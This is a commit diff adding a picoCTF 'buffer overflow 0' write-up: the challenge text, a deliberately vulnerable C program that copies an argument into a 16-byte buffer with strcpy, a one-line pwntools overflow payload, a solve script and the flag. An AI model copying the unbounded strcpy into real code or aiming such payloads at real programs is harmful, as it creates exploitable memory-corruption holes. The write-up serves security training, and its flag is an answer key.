Added buffer overflow

PlatyPew · PlatyPew · commit dfda5981242d · 2018-09-29T14:35:03.000+08:00
diff --git a/Binary Exploitation/buffer overflow 0/README.md b/Binary Exploitation/buffer overflow 0/README.md
@@ -0,0 +1,25 @@
+# buffer overflow 0
+Points: 150
+
+## Category
+Binary Exploitation
+
+## Question
+>Let's start off simple, can you overflow the right buffer in this [program](files/vuln) to get the flag? You can also find it in /problems/buffer-overflow-0_2_aab3d2a22456675a9f9c29783b256a3d on the shell server. [Source](files/vuln.c). 
+
+### Hint
+>How can you trigger the flag to print?
+>
+>If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren't expecting.
+
+## Solution
+Simple buffer overflow question
+
+```bash
+./vuln $(python -c "from pwn import *; print 'A' * 28 + p32(0x804862b)")
+```
+
+Working solution [solve.sh](solution/solve.sh)
+
+### Flag
+`picoCTF{ov3rfl0ws_ar3nt_that_bad_5d8a1fae}`
diff --git a/Binary Exploitation/buffer overflow 0/files/vuln b/Binary Exploitation/buffer overflow 0/files/vuln
diff --git a/Binary Exploitation/buffer overflow 0/files/vuln.c b/Binary Exploitation/buffer overflow 0/files/vuln.c
@@ -0,0 +1,41 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <signal.h>
+
+#define FLAGSIZE_MAX 64
+
+char flag[FLAGSIZE_MAX];
+
+void sigsegv_handler(int sig) {
+  fprintf(stderr, "%s\n", flag);
+  fflush(stderr);
+  exit(1);
+}
+
+void vuln(char *input){
+  char buf[16];
+  strcpy(buf, input);
+}
+
+int main(int argc, char **argv){
+  
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
+    exit(0);
+  }
+  fgets(flag,FLAGSIZE_MAX,f);
+  signal(SIGSEGV, sigsegv_handler);
+  
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+  
+  if (argc > 1) {
+    vuln(argv[1]);
+    printf("Thanks! Received: %s", argv[1]);
+  }
+  else
+    printf("This program takes 1 argument.\n");
+  return 0;
+}
diff --git a/Binary Exploitation/buffer overflow 0/solution/flag.txt b/Binary Exploitation/buffer overflow 0/solution/flag.txt
@@ -0,0 +1 @@
+picoCTF{ov3rfl0ws_ar3nt_that_bad_5d8a1fae}
diff --git a/Binary Exploitation/buffer overflow 0/solution/solve.sh b/Binary Exploitation/buffer overflow 0/solution/solve.sh
@@ -0,0 +1,3 @@
+#!/bin/sh
+
+./vuln $(python -c "from pwn import *; print 'A' * 28 + p32(0x804862b)")
diff --git a/Binary Exploitation/buffer overflow 0/solution/vuln b/Binary Exploitation/buffer overflow 0/solution/vuln
diff --git a/README.md b/README.md
@@ -10,6 +10,7 @@ This CTF was done with [@pauxy](https://github.com/pauxy) and [@StopDuckRoll](ht
 - [Web Exploitation](#web-exploitation)
 
 ## Binary Exploitation
+- [buffer overflow 0](Binary%20Exploitation/buffer%20overflow%200)
 
 ## Cryptography
 - [Crypto Warmup 1](Cryptography/Crypto%20Warmup%201) - 75
@@ -42,3 +43,4 @@ This CTF was done with [@pauxy](https://github.com/pauxy) and [@StopDuckRoll](ht
 - [Logon](Web%20Exploitation/Logon) - 150
 - [Mr. Robots](Web%20Exploitation%2FMr.%20Robots) - 200
 - [Irish Name Repo](Web%20Exploitation/Irish%20Name%20Repo) - 200
+- [Buttons](Web%20Exploitation/Buttons) - 250

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1 @@`
	`1`	`+picoCTF{ov3rfl0ws_ar3nt_that_bad_5d8a1fae}`
Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,3 @@`
	`1`	`+#!/bin/sh`
	`2`	`+`
	`3`	`+./vuln $(python -c "from pwn import ; print 'A' 28 + p32(0x804862b)")`